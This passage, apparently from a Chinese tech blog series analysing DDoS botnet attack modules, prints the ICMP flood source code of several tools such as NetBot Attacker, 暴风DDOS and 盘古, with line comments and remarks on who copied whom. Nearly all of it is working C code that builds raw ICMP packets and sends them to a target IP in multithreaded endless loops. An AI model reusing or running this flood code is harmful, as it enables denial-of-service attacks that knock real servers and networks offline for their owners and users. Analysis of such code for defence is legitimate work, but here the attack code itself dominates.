icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount(); //时间戳 GetTickCount()从操作系统启动到现在所经过(elapsed)的毫秒数,它的返回值是DWORD。
char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
if(IsStop==1)//是否在攻击状态
{
ExitThread(0);
return 0;
}
for(int a=0;a<10;a++) //攻击次数 才攻击10次是不是太少了
sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); //向一指定目的地发送数据
}
return 0;
}
//=================================================================================
NetBot_Attacker.h
//大家看这个是不是跟 冷风的.h 代码一样呢呵呵 我认为是冷风抄袭NB的呵呵应为NB这个写的早冷风给我的时候比较晚
//冷风给我的时候 NB的这个代码还没发布呢 说明NB早就给冷风了
//在这里就不注释了
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); //判断SOCKET版本 冷风的.h 没做
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);
int seq_no=0;
while(!stopfuck)
{
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
if (seq_no>=65534)
seq_no=1;
Sleep(40);
}
return 0;
}
//=================================================================================
暴风DDOS.h
#define ICMP_ECHO 8
#define MAX_PACKET 4096
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
void icmp_flood()
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); //COCKET版本
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest; //IP信息结构
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{ //inet_addr将ip地址转换成网络地址 INADDR_NONE非法地址
struct hostent *hp = NULL; //hostent IP信息结构体
if ((hp = gethostbyname(tgtIP)) != NULL) //gethostbyname主机信息
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length); //复制内存
m_addrDest.sin_family = hp->h_addrtype;
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送
int seq_no=0;
int sleep_time = SleepTime/10; //这个值好像没有用到啊
while(1)
{
if (StopFlag == 1)//是否在攻击状态
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0;//发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
for (int i=0;i<100;i++) //循环攻击100次
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
Sleep(5); //暂停(毫秒)
}
return;
}
void StartICMP(char ip[30],int port,int time,int xc)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
port=tgtPort;
time=timeout;
if (StopFlag == -1)
return;
StopFlag=-1;
for(i=0;i<xc;i++)
{
h=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
}
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
//==================== ================================
暴风DDOSVIP2010-225源代码.h
/*-----------------------------ICMP data-----------------------------------------------*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
void icmpattack()
{
WSADATA wsaData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本
SOCKET m_hSocket;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
SOCKADDR_IN m_sockaddr; //IP信息结构
m_sockaddr.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(tgtIP); //攻击IP
ICMP_HEADER icmp_header;//icmp头结构
icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount();//时间戳
char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化 初始化攻击数据
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
if(StopFlag==1)//是否在攻击状态
{
ExitThread(0);
return;
}
for(int a=0;a<10;a++) //攻击次数
sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); //向一指定目的地发送数据
}
WSACleanup(); //中止Windows Sockets DLL的使用
return;
}
void StartICMP(char ip[30],int port,int time,int xc)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
tgtPort=port;
timeout=time;
if (StopFlag == -1)
return;
StopFlag=-1;
for(z=0;z<xc;z++)
{
h[z]=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmpattack,NULL,0,NULL);
}
if(timeout!=0)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
//================ ===================================
分布式DDOS.h
struct ICMPHeader //24bytes
{
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned short ProcessID;
unsigned short Seq;
char data[16];
};
//initialize ICMP packet
void InitICMPPacket(ICMPHeader* p)
{
p->type=8; //告之所发送的是探测主机类型的icmp 即ping
p->code=0;//发送默认
p->ProcessID=(unsigned short)GetCurrentProcessId(); //自己的id GetCurrentProcessId()进程ID
p->Seq=0;//序列
char buf[]="Attack you!";
strcpy(p->data,buf); //发送数据内容
unsigned long ulSum=0;
unsigned short *pBuf=(unsigned short *)p;
int size=sizeof(ICMPHeader);
int index=0;
for(;size > 1;size -= 2,index++)
ulSum += pBuf[index];
if(size != 0) ulSum += pBuf[index];
ulSum = (ulSum>>16) + (ulSum&0xffff);
ulSum += (ulSum>>16);
p->checksum = (unsigned short)(~ulSum);
}
UINT CDDOSClientDlg::AttackThread(void* param)
{
CDDOSClientDlg *p = (CDDOSClientDlg *)param;
SOCKET att_sock = socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP); //创建socket UDP模式
SOCKADDR_IN att_addr; //IP信息结构
att_addr.sin_family = PF_INET; //sin_family 地址家族(必须是AF_INET)
att_addr.sin_addr.s_addr = inet_addr(p->att_head.ip); //inet_addr将ip地址转换成网络地址
ICMPHeader packet;
InitICMPPacket(&packet); //填充ICMP首部
while(p->isAttacking)
{
sendto(att_sock,(char *)&packet,sizeof(ICMPHeader),0,(sockaddr *)&att_addr,sizeof(SOCKADDR_IN)); //向一指定目的地发送数据
//Sleep(1000);
}
return 0;
}
//======================= ==========================
盘古1.5代码.h
//这里我们可以看到和 暴风DDOS.h 是一样的所以我们不介绍了
//暴风DDOS(前几个版本) 的攻击模块是使用盘古的
/////////////ICMP 攻击
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
#define ICMP_ECHO 8
#define MAX_PACKET 4096
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
void icmp_flood() //ICMP攻击
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
//sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
//inet_addr将ip地址转换成网络地址 IP地址不正确返回INADDR_NONE
{
struct hostent *hp = NULL; //hostent域名转换成IP
if ((hp = gethostbyname(tgtIP)) != NULL)
//gethostbyname主机信息 tgtIPIP地址 != NULL不等于空
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
//hp->h_length表示的是主机ip地址的长度
m_addrDest.sin_family = hp->h_addrtype;
//hp->h_addrtype主机ip地址的类型是ipv4(AF_INET)还是ipv6(AF_INET6)
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET); //填充ICMP首部
int seq_no=0;
int sleep_time = SleepTime/10; //并没有使用到
while(1)
{
if (StopFlag == 1) //StopFlag= 1; 表示没有在攻击
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
for (int i=0;i<100;i++)
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
Sleep(5);
}
return;
}
/////////////////ICMP攻击结束
//================== ===============================
盘古DDOS优化版.h
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
#define ICMP_ECHO 8
#define MAX_PACKET 4096
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
///ICMP
char icmpBuffer[256]="啊啊啊啊啊"; //攻击数据
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制攻击数据
}
void icmpflood()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE) //网络地址 被攻击者的IP
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtip)) != NULL)
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
m_addrDest.sin_family = hp->h_addrtype;
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
//HeapAlloc分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构
int seq_no=0;
while(1)
{
if (Stop == 1)
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
for (int i=0;i<1000;i++)
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
Sleep(20);
}
return;
}
//===================================================== ===
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Java反射机制详解
- asp.net下调用Matlab生成动态链接库
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----GET篇
- 修改11—1的程序编程instanceof
- C#调用Matlab生成的dll方法的详细说明_C#教程
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
- JAVA入门知识汇总
- MyEclipse 修改工程名
- ThinkPHP表单数据智能写入create方法实例分析
- 走向高手的编程算法
- c#中的Rank属性和GetUpperBound,GetLowerBound(0)方法
- 深入解析Java接口(interface)的使用
- 黑马程序员——C语言基础---函数
- spring如何加载classpath和classpath*资源
- C# 动态数组
- 从c到c++<二>
- 简单理解Java的抽象类
- C++技术点积累(8)——STL之算法汇总
- PHP+MySQL之Insert Into数据插入用法分析